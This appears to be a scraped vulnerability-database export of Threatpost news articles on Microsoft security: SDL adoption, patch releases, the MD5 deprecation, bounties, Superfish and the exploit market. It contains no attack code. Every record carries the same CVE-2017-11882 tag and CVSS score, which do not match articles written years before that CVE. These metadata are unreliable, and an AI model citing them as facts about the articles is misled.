"2013-04-17T16:36:22", "id": "THREATPOST:1071D90B9DDF02B6FC796EE160E0AFDD", "href": "https://threatpost.com/another-windows-7-zero-day-released-080910/74306/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:05", "description": "[](<https://threatpost.com/microsofts-sdl-expands-beyond-redmond-051612/>)It\u2019s been more than 10 years now since Microsoft began the initiative that would eventually become Trustworthy Computing, and while the effects it\u2019s had inside the company have been well documented, the utility and adoption of the Security Development Lifecycle by outside organizations and customers is less well-known. Several large organizations have adopted the SDL, either in whole or in part, and Microsoft executives say that the effects on these organizations are going to be just as important as they were for Microsoft.\n\nThe company this week is hosting its first Security Development Conference in Washington, D.C., and one of the things that Microsoft executives are focusing on is how the SDL has spread beyond Redmond and taken hold in a number of other industries and organizations. One of those recent adopters of the SDL is Itron, a company that manufacturers smart meters for installation around the world. Those meters are used to regulate and measure power usage in homes and businesses and the use of these machines has become somewhat controversial in the security community because of potential vulnerabilities and attacks. \n\nTo help address those issues, Itron began a software security program, based on the Microsoft SDL. The idea behind the effort is to address potential security bugs and attack vectors before the meters are deployed. Steve Lipner, one of the driving forces behind the Trustworthy Computing initative and SDL at Microsoft, said in an interview that the company is happy to see the SDL spreading beyond Microsoft\u2019s walls and having an effect in other industries.\n\n\u201cIt\u2019s very important to see adoption by governments and private industry,\u201d he said. \u201cThe adoption of secure development can have an important global effect. Some of the meter specifications involve providing a disconnect switch on the meters and they needed to get the security right or the consequences could be devastating.\u201d\n\nSecurity researchers already have discovered [vulnerabilities in some smart meters](<https://threatpost.com/researchers-find-security-flaws-smart-meters-033110/>) and privacy advocates have questioned whether the data on the meters will be protected adequately. Last year, California approved new [data security rules for smart meters](<https://threatpost.com/california-approves-data-security-rules-smart-meters-081711/>), which prevent the utilities from disclosing customers\u2019 usage or other data to third parties. Those same concerns about attacks and vulnerabilities are what is driving the use of the SDL at Itron.\n\n\u201cThe light bulb went off for me when my customer looked across the table and said, \u2018We\u2019re planning on putting disconnect switches on every meter,\u2019\u201d Michael Garrison Stuber, an engineering advisor at Itron, said. \u201cThe implication was that this level of access to the network would equal the ability to control that network. From that standpoint I immediately realized, \u2018This could be a giant target.\u2019\u201d\n\nFor some companies, the development of a software security program is driven by a recent security failure or series of attacks, but for others it\u2019s more a case of customers pushing the vendor. That was the case for Microsoft when it began its effort more than a decade ago, and also for Itron. But some of the motivation also came from not wanting to go through the typical release, bug, patch cycle any longer. Paying pen testers and consultants to find bugs after the products are made can be an expensive proposition.\n\n\u201cI got tired of writing six-figure checks to these outside vendors,\u201d said Stuber. \u201cFrom a business standpoint it just made perfect sense to me that we need to be investing in how we do development so we\u2019re thinking about security throughout the lifecycle.\u201d\n\nLipner said he\u2019d like to see even more adoption of the SDL in other industries.\n\n\u201cWe\u2019re encouraging customers to adopt the tools we\u2019ve published as a way to save money and build more secure software,\u201d he said. \u201cThe customers need to demand secure development practices.\u201d\n", "cvss3": {}, "published": "2012-05-16T13:14:29", "type": "threatpost", "title": "Microsoft's SDL Expands Beyond Redmond", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:14", "id": "THREATPOST:44C6EDF349E9D3038D1847321D79E4DF", "href": "https://threatpost.com/microsofts-sdl-expands-beyond-redmond-051612/76570/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:02", "description": "[](<https://threatpost.com/microsoft-fills-windows-office-holes-march-patch-release-030811/>)Microsoft Corp. issued their monthly security bulletins on Tuesday, with fixes for four known vulnerabilities in the company\u2019s Windows operating system, Office suite and Remote Desktop Connection products. \n\nThe March patch release included three bulletins: [MS11-015](<http://www.microsoft.com/technet/security/bulletin/ms11-015.mspx>), [016 ](<http://www.microsoft.com/technet/security/bulletin/ms11-016.mspx>)and [017](<http://www.microsoft.com/technet/security/bulletin/ms11-017.mspx>). Only one, MS11-015, is rated critical \u2013 indicating a danger of the holes being used in remote attacks or to enable fast spreading worms. The other two bulletins are rated \u201cimportant.\u201d \n\nMS11-015 fixes a publicly disclosed hole in the DirectShow product and one previously undisclosed vulnerability in Windows Media Player and Media Center. The vulnerabilities, if exploited, would have allowed attackers to use specially crafted Microsoft Digital Video Recording (.dvr-ms) files to run malicious code on a vulnerable Windows system. Microsoft rated it critical for affected versions of Windows XP, as well as all supported versions of Windows Vista and Windows 7. Windows Media Center TV Pack for Vista is also affected, the company said. \n\nBoth the MS11-016 and 017 patches address DLL preloading issues in Microsoft products \u2013 Microsoft Groove 2007 Service Pack 2, and Windows Remote Client Desktop. That issue, which affects a wide range of software from different vendors, was first disclosed in August 2010. In September, Microsoft [released guidance on the](<https://threatpost.com/microsoft-publishes-new-fixit-tool-dll-bug-090110/>) impact of the DLL hijacking bug, and a Fix-It tool that allowed customers to ameliorate the impact of the hole.\n\nThe company did not issue a fix for a serious flaw in the way that Windows manages MHTML operations. As Threatpost [reported last month](<https://threatpost.com/microsoft-warns-mhtml-bug-windows-012811/>), that hole affects all current versions of Windows and could allow an attacker to run code on vulnerable systems. In its bulletin, Microsoft issued a Security Advisory about the MHTML bug in January. In its March Patch release, the company said that it was \u201cmonitoring the threat landscape\u201d and \u201cworking to provide a solution through our monthly security update release process,\u201d suggesting that the company would not do an out-of-cycle security patch to plug the MHTML hole once a fix is available. \n\nMarch\u2019s batch of patches is smaller than the company\u2019s February release, which [comprised 12 separate bulletins containing fixes for 22 vulnerabilities across a range of products](<https://threatpost.com/microsoft-fills-windows-office-holes-march-patch-release-030811/>).\n", "cvss3": {}, "published": "2011-03-08T21:23:27", "type": "threatpost", "title": "Microsoft Fills Windows, Office Holes with March Patch Release", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:00", "id": "THREATPOST:B4B23ADD1522DC53A0B05300F439AB03", "href": "https://threatpost.com/microsoft-fills-windows-office-holes-march-patch-release-030811/75006/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:21", "description": "The clock is running on Windows administrators to sweep out MD5 implementations before a February 2014 patch from Microsoft slams the door shut on the broken, aged crypto algorithm.\n\nMicrosoft released a pair of advisories yesterday in addition to its regular [Patch Tuesday security updates](<http://threatpost.com/microsoft-august-patch-tuesday-addresses-critical-ie-exchange-and-windows-flaws/101981>) alerting users to the fact it would in six months [restrict the use of digital certificates with MD5 hashes](<http://technet.microsoft.com/en-us/security/advisory/2862973>) issued under roots in the Microsoft root certificate program. Admins should use the leeway to find any systems or applications relying on MD5 and determine whether the patch will break anything and otherwise impact their environments.\n\nThe second advisory announced the optional availability of network level authentication (NLA) as an authentication method that can be used during [Remote Desktop Protocol sessions](<https://support.microsoft.com/kb/2861855>). [NLA adds a layer of security to RDP sessions](<http://technet.microsoft.com/en-us/library/cc732713.aspx>) by requiring that the user be authenticated to the host server before creation of a session.\n\n\u201cMicrosoft seems to be going after less secure encryption techniques, and that\u2019s a good thing for Microsoft to start eliminating them from the landscape, especially MD5,\u201d said Lamar Bailey, director of security research and development at Tripwire. \u201cI also like the way they are releasing them as optional right now. [The MD5 patch] will be pushed out live in February, so this gives customers a chance to determine if it\u2019s going to break anything.\u201d\n\nWhen the patch is pushed universally in February, [MD5 hashes will no longer be accepted](<http://support.microsoft.com/kb/2862973>) among Microsoft root certificates. The change applies only to certificates used for server authentication, code signing and time stamping, Microsoft said, adding that it would not block other uses of MD5, and that it would allow for signed binaries that were signed before March 2009.\n\nCustomers need to determine, in the meantime, which services are still using MD5 crypto and switch to a stronger algorithm such as the SHA2 family. Weaknesses in MD5 were identified as early as the mid-1990s and research demonstrating collisions was presented in 2004 and 2005. In 2008, practical collision attacks including one where an attacker could spoof a trusted root certificate authority were also demonstrated, leading CERT late in that year to release [vulnerability note](<http://www.kb.cert.org/vuls/id/836068>) that sounded the death knell for MD5.\n\nYet, vulnerability scanners and penetration testers continue to find MD5 inside organizations today and flag them for weak cryptography. The problem is that is that in order for users to change crypto on their servers, they have to manually edit the registry, which can be a chore.\n\n\u201cI\u2019m all for changing it; it should be gone and we see it in customer sites all the time,\u201d Bailey said. \u201cBut we have to make it easier to change it. It\u2019s like if you get a recall notice from a car manufacturer that says \u2018If you have this spark plug, bring your car in for servicing.\u2019 I don\u2019t know what spark plugs my car is running. I have to dive under the cover to figure out if I have what they\u2019re saying is bad.\u201d\n\nExperts say most production servers and webservers hosting production websites are likely not running MD5; it\u2019s second-tier development servers, for example, that were spun up years ago and still store sensitive data that are the outlying issue here\u2014and a tempting target for a hacker. With MD5 broken for so long, enough attacks have been made public and enough advances have been made in processor speeds that cracking MD5 crypto isn\u2019t likely that much of a barrier for an attacker.\n\nRoss Barrett, senior manager of security engineering with Rapid7, said that attackers can use stolen certificates to redirect traffic or inject malware.\n\n\u201cIt\u2019s a bit of a heavy-handed attack to just steal credit cards, but if you have a national security program and you\u2019re sweeping for anyone you can get at, this might justify the cost and effort behind this type of attack,\u201d Barrett said. \u201cAny crypto [attack] relies on the complexity of generating the hash versus the difficulty of creating a collision. This can be facilitated as we get more powerful computers and the technology gets stronger to do so. Plus you have a black market industry building computers suited for doing lots of math, like cracking hashes and generating collisions.\u201d\n\nTripwire\u2019s Bailey, for example, estimates that 30 percent of the customers he deals with are still running MD5 somewhere in their environments.\n\n\u201cWe see it with a lot of homegrown systems and apps where the team that worked on it built it years ago and may not be there anymore. They built a custom app running MD5 crypto and said that was good enough because they were internal. Well it\u2019s not.\u201d\n\nThis isn\u2019t Microsoft\u2019s first move against weak cryptographic schemes. Last October, it released a mechanism organizations could use to find RSA certificate key lengths shorter than 1024. In June, anything shorter was considered untrusted and was revoked. Microsoft, in fact, urged customers to move to 2048-bit or higher keys.\n\n\u201cThe test will be for the end user that this is coming and it\u2019s time to get rid of it in the environment,\u201d Bailey said. \u201cAnd Microsoft is testing too whether any of its customers push back and need more time. If February rolls around and it\u2019s not a mandatory update, that\u2019s probably what happened. I don\u2019t remember Microsoft giving customers such a long runway on this kind of change. They must think [MD5] is out there more than we do to give customers that long of a runway of time.\u201d\n", "cvss3": {}, "published": "2013-08-14T14:25:38", "type": "threatpost", "title": "Microsoft to Eliminate Weak MD5 Crypto Algorithm", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-16T18:11:59", "id": "THREATPOST:856DD01A5D951BB0E39AE06B64DDD2A7", "href": "https://threatpost.com/microsoft-starts-countdown-on-eliminating-md5/101994/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:25", "description": "When Microsoft introduced use-after-free mitigations into Internet Explorer last summer, certain classes of exploits were closed off, and researchers and black hats were left to chase new ways to corrupt memory inside the browser.\n\nA team of experts from HP\u2019s Zero Day Initiative were among those who noticed that once-reliable exploits were no longer behaving as expected, and traced it back to a number of mitigations silently introduced in July into IE. By October, researchers Brian Gorenc, AbdulAziz Hariri, and Simon Zuckerbraun had developed attacks against two mitigations, Isolated Heap and MemoryProtection, and today announced they\u2019d been awarded $125,000 from the Microsoft Mitigation Bypass Bounty and Blue Hat Bonus for Defense.\n\nA chunk of that total, $25,000, was awarded separately for a submission suggesting a defense against the technique they submitted. The researchers said they will donate the full bounty to Texas A&amp;M University, Concordia University, and Khan Academy, three institutions that sponsor strong STEM (science, technology, engineering and mathematics) programs.\n\n\u201cWe were very excited when we heard the results from Microsoft,\u201d Gorenc, ZDI lead researcher, said. \u201cWe put a lot of time and effort into that research. We\u2019re glad to hear Microsoft got good data out of it.\u201d\n\nGorenc said Microsoft has not patched the issues identified in the HP ZDI research, and as a result, Gorenc said ZDI will not disclose details yet. He did tell Threatpost that part of the attack includes using MemoryProtect as an oracle to bypass Address Space Layout Randomization (ASLR).\n\n\u201cWe use one mitigation to defeat another,\u201d he said. \u201cStuff like this has been done in the past, but what\u2019s interesting about this one is that these mitigations were designed to make use-after-free harder on the attacker, but what we\u2019ve done is made it defeat another mitigation that IE relies on; it weakens it in that perspective. It was interesting to see one used against another.\u201d\n\nUse-after-free vulnerabilities have overtaken buffer overflows as the hot new memory-corruption vulnerability. They happen when memory allocated to a pointer has been freed, allowing attackers to use that pointer against another area in memory where malicious code has been inserted and will be executed. Microsoft, for its part, has invested money and time into building mitigations against memory-related attacks, not only with the inclusion of mitigations in Internet Explorer, but also through its Enhanced Mitigation Experience Toolkit (EMET). For the most part[, bypasses of and attacks against mitigations have largely been confined to researchers and academics](<http://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570>), but some high-profile targeted attacks that have been outed do take into consideration the presence of these mitigations. Operation Snowman, for example, an APT operation against military and government targets, [scanned for the presence of EMET and would not execute](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>) if the tool was detected.\n\nInternet Explorer has been plagued by [memory corruption bugs](<http://threatpost.com/emet-av-disclosure-leak-plugged-in-ie/108175>) forever it seems, with Microsoft releasing almost [monthly cumulative updates for the browser](<http://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729>) which is constantly being used in targeted attacks and has been easy pickings for hackers.\n\n> ZDI said it will donate the full Microsoft bug bounty to three institutions that sponsor strong STEM programs.\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fie-memory-attacks-net-zdi-125000-microsoft-bounty%2F110876%2F&text=ZDI+said+it+will+donate+the+full+Microsoft+bug+bounty+to+three+institutions+that+sponsor+strong+STEM+programs.>)\n\n\u201cThe attack surface is valuable and has to exist,\u201d Gorenc said of IE and use-after-free bugs. \u201cIt\u2019s an attack surface where with slight manipulations, you can gain code execution on the browser.\u201d\n\nZDI, Gorenc said, has spent the majority of its money on the use-after-free attack surface; ZDI is a vulnerability program that rewards researchers who disclose vulnerabilities through its process. The bugs are shared with HP customers first and then with the affected vendors. ZDI said it has spent $12 million dollars over the past nine years buying vulnerabilities.\n\nGorenc\u2019s colleagues Zuckerbraun and Hariri were external contributors before joining ZDI full time; both spent a lot of time on IE and use-after-free submissions, HP said. For these attacks, Zuckerbraun [reverse engineered MemProtect](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Efficacy-of-MemoryProtection-against-use-after-free/ba-p/6556134#.VNNkLC60CL0>), studying how it stymied use-after-free vulnerabilities. Hariri focused on [bypassing Isolated Heap](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/HP-Security-Briefing-episode-18-New-directions-in-use-after-free/ba-p/6659998#.VNNkNS60CL0>). Together with Gorenc\u2019s work on sandbox bypasses, the researchers soon had enough research to share with Microsoft.\n\nThe reward, meanwhile, will be donated to the three education institutions, each of which have personal meaning to the respective researchers and their focus on STEM.\n\n\u201cHP Security Research donates to organizations that have a strong STEM emphasis. We decided we would select organizations and charities to receive the money we won that support that emphasis,\u201d Gorenc said. \u201cWe look at it as a way to give back. Hopefully our research has made our environment better, hardened IE, and helps fund a strong engineering organization.\u201d\n", "cvss3": {}, "published": "2015-02-05T10:19:00", "type": "threatpost", "title": "IE Memory Attacks Net ZDI $125,000 Microsoft Bounty", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-12T17:07:39", "id": "THREATPOST:537857B2E29A08953D50AC9EDE93162F", "href": "https://threatpost.com/ie-memory-attacks-net-zdi-125000-microsoft-bounty/110876/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:37", "description": "Dennis Fisher and Mike Mimoso discuss the latest security news, including the possible fork of TrueCrypt, Microsoft\u2019s new information sharing platform, the FBI\u2019s cybercrime task force and the US team\u2019s crushing tie with Portugal.\n\nDownload: [digital_underground_156.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_156.mp3>)\n\nMusic by Chris Gonsalves\n\n[](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2014-06-23T15:17:13", "type": "threatpost", "title": "Threatpost News Wrap, June 23, 2014", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-25T15:52:47", "id": "THREATPOST:415E19FC1402E6223871B55143D39C98", "href": "https://threatpost.com/threatpost-news-wrap-june-23-2014/106812/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:57", "description": "Microsoft has taken steps to impede the next Superfish from impacting users.\n\n[Superfish was pre-installed adware](<https://threatpost.com/lenovo-superfish-certificate-password-cracked/111165/>) found on new Lenovo laptops earlier this year. The software exposes users to man-in-the-middle attacks because of the way it injects advertisements into the browser. It comes with a self-signed root cert that generates certs for HTTPS connections, replacing existing certs with its own in the process. Attackers could take advantage of this scenario\u2014especially after the password for the cert that shipped with Superfish was found\u2014to listen in on encrypted communication.\n\nMicrosoft this week said it has [updated its rules around adware](<https://blogs.technet.microsoft.com/mmpc/2015/12/21/keeping-browsing-experience-in-users-hands/>), and now such programs that build ads in the browser are required to only use the browser\u2019s \u201csupported extensibility model for installation, execution, disabling and removal.\u201d Microsoft said starting March 31, 2016 it will detect and begin removing programs that are not in compliance.\n\n\u201cThe choice and control belong to the users, and we are determined to protect that,\u201d wrote Barak Shein and Michael Johnson of Microsoft\u2019s Malware Protection Center.\n\nLenovo quickly patched the original Superfish issue and shortly thereafter, browser makers such as [Mozilla removed the root cert from Firefox\u2019s trusted root store](<https://threatpost.com/mozilla-pushes-hot-fix-to-remove-superfish-cert-from-firefox/111335/>).\n\nSuperfish\u2019s ability to perform SSL interception by proxy was certainly worrisome behavior from a supposedly trusted product, one that was suddenly opening the door not only to man-in-the-middle attacks, but also the manipulation of DNS settings and other network-layer attacks. Worse yet was that Superfish-like software would not trigger warnings about man-in-the-middle attacks.\n\n\u201cAll of these techniques intercept communications between the Internet and the PC to inject advertisements and promotions into webpages from outside, without the control of the browser,\u201d Microsoft said. \u201cOur intent is to keep the user in control of their browsing experience and these methods reduce that control.\u201d\n", "cvss3": {}, "published": "2015-12-23T09:01:25", "type": "threatpost", "title": "Microsoft Bans Superfish SSL Interception Adware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-12-23T14:01:25", "id": "THREATPOST:DD69574508B1751B9C9B01C26AE809C1", "href": "https://threatpost.com/microsoft-to-remove-superfish-like-programs-starting-in-march/115730/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:24", "description": "_Editor\u2019s Note: This is the second of a [two-part](<https://threatpost.com/how-free-market-fails-privacy-conscious-consumers-040412/>) podcast with independent security researcher Chris Soghoian. _\n\nIn the [first part](<https://threatpost.com/how-free-market-fails-privacy-conscious-consumers-040412/>) of our podcast with independent security researcher Chris Soghoian, we talked about the way that the proliferation of \u201cfree\u201d applications have forced consumers into the position of increasingly trading privacy for access to cool new Web sites and tools. The market, Soghoian argued, has failed to provide choice to consumers who may want to participate in social networks, but don\u2019t want their online activities passed along to advertisers. __\n\nIn the second half of his interview with Threatpost Editor Paul Roberts, Chris switched focus from consumer protections from advertisers, to the fast-growing market for surveillance products.\n\n<https://media.threatpost.com/wp-content/uploads/sites/103/2012/04/07052336/chris_soghoian-_part2.mp3>\n\nAs Soghoian sees it, the public sector \u2013 both government and law enforcement \u2013 have abrogated their responsibility to protect consumers from online predation. Why, you might ask? In Soghoian\u2019s view, the government turns a blind eye to insecure computers because those same insecure systems might provide access to law enforcement or intelligence services, should they need it.\n\nIts a daring claim, and one that\u2019s difficult to prove, because so much of the dealing in undocumented (\u201czero day\u201d) software vulnerabilities happens behind the scenes. Even published reports about information on exploitable holes in popular devices (like the [recent Forbes report about an Apple iOS zero day that sold for $250,000](<http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/>)) are often attributed to unnamed sources and impossible to verify. What is clear, Soghoian says, is that the discovery and publication of information on software holes in popular platforms [like Internet Explorer](<https://threatpost.com/ie-9-falls-pair-zero-days-pwn2own-030812/>) has gone from an open and mostly volunteer activity by a small cadre of experts to a burgeoning and mostly underground market between researchers and software firms or, increasingly, indepedent middlemen. The market itself is worth tens- if not hundreds of millions of dollars.\n\nSoghoian said the public expects intelligence agencies to engage in digital spycraft.\n\n\u201cI\u2019m not nieve enough to believe governments can be stopped from doing this,\u201d Soghoian said. \u201cNSA is always going to be able to hack into people\u2019s systems and there\u2019s nothing we can do to stop this.\u201d\n\nBut the global trade in exploits by private firms, [such as Vupen Security](<https://threatpost.com/ie-9-falls-pair-zero-days-pwn2own-030812/>) and other firms is another matter, he claims.\n\n\u201cIf you think of our own intelligence agencies can be trusted, maybe you don\u2019t think foreign intelligence agencies can. And U.S. middleman firms are providing these flaws to these agencies.\u201d\n\nSoghoian is not the first authority to raise the red flag on for profit vulnerability and exploit sales. At the CANSECWEST security show in Vancouver, [Chaouki Bekrar of VUPEN security defended his company\u2019s sales of exploitable security holes to private customers](<https://threatpost.com/chaouki-bekrar-man-behind-bugs-030912/>). Bekrara told Threatpost at that show that VUPEN would be holding on to a memory corruption flaw in IE\u2019s protected mode sandbox for itself and its customers. It can be reused in combination with other bugs in IE for future sales, much to the consternation of security researchers.\n\nJust as troubling, Soghoian says, is the growing use of digital surveillance tools by even state and local authorities \u2013 a development that Soghoian finds troubling.\n\n\u201cThe Keystone cop is not an expert in information security,\u201d he said.\n\nRather than tolerate widespread insecurity on both laptop and mobile devices, governments \u2013 including the U.S. government \u2013 should use its full weight to encourage better online security, including automated patching and software updates to remove exploitable holes, he said.\n\nCheck out the rest of [Threatpost\u2019s interview with Chris Soghoian here](<https://threatpost.com/arms-race-zero-days-spells-trouble-privacy-public-safety-040512/>).\n", "cvss3": {}, "published": "2012-04-05T11:30:00", "type": "threatpost", "title": "Arms Race In Zero Days Spells Trouble For Privacy, Public Safety", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-18T19:20:47", "id": "THREATPOST:4E345D523AA3EF8D5D06880D1063B0C6", "href": "https://threatpost.com/arms-race-zero-days-spells-trouble-privacy-public-safety-040512/76400/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:04", "description": "Microsoft has confirmed the reported [vulnerability in the WebDAV implementation in IIS 5.0, 5.1 and 6.0](<http://www.microsoft.com/technet/security/advisory/971492.mspx>), saying that the flaw could be used to bypass the authentication mechanism on the Web server. However, the company said that there are a number of mitigating factors involved and that company security officials have not seen any attacks against the weakness so far.\n\nMicrosoft officials said that the vulnerability is mitigated by several things, including the fact that WebDAV is not enabled by default on IIS 6.0. However, the WebDAV protocol is widely used to share documents and information on Web servers. Normally implemented access control lists (ACLs), which prevent users from accessing files that they do not have permission to access, also would limit the damage of an attack.\n\nThe company also said that the vulnerability affects versions 5.0 and 5.1 of IIS, along with 6.0, which was the version that had been reported to be vulnerable originally. The most effective workaround until a patch is available is to disable WebDAV.\n", "cvss3": {}, "published": "2009-05-19T13:59:37", "type": "threatpost", "title": "Microsoft confirms flaw in WebDAV in IIS", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:13", "id": "THREATPOST:FAE0DDDC6420E9881C1D719E13B77095", "href": "https://threatpost.com/microsoft-confirms-flaw-webdav-iis-051909/72674/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:46", "description": "Microsoft has announced the [three finalists](<http://www.microsoft.com/security/bluehatprize/finalists.aspx>) for its $200,000 [Blue Hat Prize](<https://threatpost.com/microsoft-pay-200000-innovative-defense-technology-blue-hat-prize-program-080311/>) contest and all three of the researchers in the running for the win submitted technologies designed to defeat ROP (return-oriented programming) exploits. Each of the entrants takes a different tack with his ROP defense and it will be another month before Microsoft announces at Black Hat which of them will take home the $200,000 top prize.\n\nThe Blue Hat Prize, whcih Microsoft announced at Black Hat last summer, offers researchers cash prizes for innovative defensive technologies. In some ways, it is Microsoft\u2019s response to all of the bug-bounty programs that other vendors have started in the last couple of years. Companies such as Google, Barracuda, Firefox and others have been paying researchers varying amounts for vulnerabilities that researchers disclose to them privately. Microsoft officials have said repeatedly that the company will not pay bug bounties and instead introduced Blue Hat Prize to spur innovation in defensive technologies.\n\n\u201cWhen we looked at the various economic incentive models, the bug bounty was among them. But when we looked at what researchers were doing with the bugs they found in our products across the board, we found that there were a lot more motivations for researchers than just money,\u201d Katie Moussouris, senior security strategist in Microsoft\u2019s Trustworthy Computing Group, said at the time of the initial announcement last year. \u201cThere\u2019s recognition and there\u2019s what I call the pursuit of intellectual happiness, just the act of finding these issues.\u201d\n\nOne of the problems that Microsoft officials mentioned as being ripe for innovations is that of ROP exploits. The three finalists for the first Blue Hat Prize are Jared DeMott, Ivan Fratric and Vasillis Pappas. Each of them submitted techniques for defeating or mitigating ROP exploits. Under the rules of the contest, the researcher who wins the top prize will have to agree to license the technology to Microsoft, but he will retain the rights to the technology, as well. \n\n\u201c[We received 20 entries](<http://blogs.technet.com/b/ecostrat/archive/2012/04/04/bluehat-prize-entries-the-final-tally-is.aspx>) to our inaugural BlueHat Prize contest, a response and participation from the security research community that exceeded our expectations. We now know contestants emerged from different areas of the security community \u2013 some from academia, some recognized names in the hacker community, and some from other venues entirely,\u201d [Moussouris](<http://blogs.technet.com/b/ecostrat/>) wrote on Thursday.\n\nThe winner, who will get $200,000, will be announced at the company\u2019s party at Black Hat in July. The second prize winner will get $50,000 and the third-prize winner gets an MSDN subscription. All three will fly to Las Vegas on Microsoft\u2019s dime for the announcement.\n", "cvss3": {}, "published": "2012-06-21T15:41:28", "type": "threatpost", "title": "Microsoft Reveals Blue Hat Prize Finalists", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:59", "id": "THREATPOST:A1A03F8D19A1212209F2765F29BE892C", "href": "https://threatpost.com/microsoft-reveals-blue-hat-prize-finalists-062112/76722/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:50", "description": "[](<https://threatpost.com/microsoft-plans-record-breaking-patch-tuesday-100710/>)This month\u2019s batch of security patches from Microsoft will be a record-breaking one: 16 bulletins addressing a whopping 49 security vulnerabilities. \n\nAccording to the company\u2019s advance notice, four of the 16 bulletins will be rated \u201ccritical,\u201d Microsoft\u2019s highest severity rating. Microsoft rates a critical vulnerability as one that could be exploited to propagate an Internet worm without user action. \n\nThe 49 vulnerabilities will mark the largest ever batch of patches issued by Microsoft. The previous record was 34 vulnerabilities patched in August this year.\n\nThe October patch batch will include fixes for security flaws in the Windows operating system, the Internet Explorer browser, Microsoft Office and the .NET Framework.\n\nIt is very likely that Microsoft will include patches for a pair of elevation of privilege vulnerabilities that were exploited during the mysterious Stuxnet worm attack.\n\nThe flaws in this month\u2019s release affect all version of Windows, including the newest Windows 7 and Windows Server 2008.\n", "cvss3": {}, "published": "2010-10-07T18:43:29", "type": "threatpost", "title": "Microsoft Plans Record-Breaking Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:21:27", "id": "THREATPOST:037D55F658239A9DBF47BABD04D1F6E7", "href": "https://threatpost.com/microsoft-plans-record-breaking-patch-tuesday-100710/74560/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:35", "description": "Microsoft is no exception when it comes to [large technology providers committing to encrypting](<http://threatpost.com/yahoo-encrypts-data-center-links-boosts-other-services/105228>) the services its users depend on.\n\nToday, the company [announced](<http://blogs.technet.com/b/microsoft_on_the_issues/archive/2014/06/30/advancing-our-encryption-and-transparency-efforts.aspx>) an update on the progress it has made in engineering those changes, including the news that Outlook.com, its web-based email service, supports TLS encryption inbound and outbound as well as Perfect Forward Secrecy.\n\n\u201cOur goal is to provide even greater protection for data across all the great Microsoft services you use and depend on every day,\u201d said Matt Thomlinson, vice president Trustworthy Computing. \u201cThis effort also helps us reinforce that governments use appropriate legal processes, not technical brute force, if they want access to that data.\u201d\n\nMicrosoft also announced that its OneDrive cloud-based storage service has enabled Perfect Forward Secrecy. The technology keeps data safe by randomizing private encryption keys used to secure communication; if a key is compromised, it cannot be used to decrypt other messages at a future time.\n\nIn the year-plus since the Snowden revelations began and [technology companies were questioned about the level of their complicity](<http://threatpost.com/tech-giants-update-transparency-reports-with-fisa-request-numbers/104056>) with government surveillance, firms such as Microsoft, Google, Facebook and Yahoo and have taken public stands about the security of their services.\n\nDevelopers are being encouraged to use encryption and security technologies such as HTTPS, HSTS and PFS as default starting points in new applications. In December, Microsoft said it would have encryption protecting its services by the end of this year, including supporting HSTS on its public-facing services that exchange data, including email and credentials. 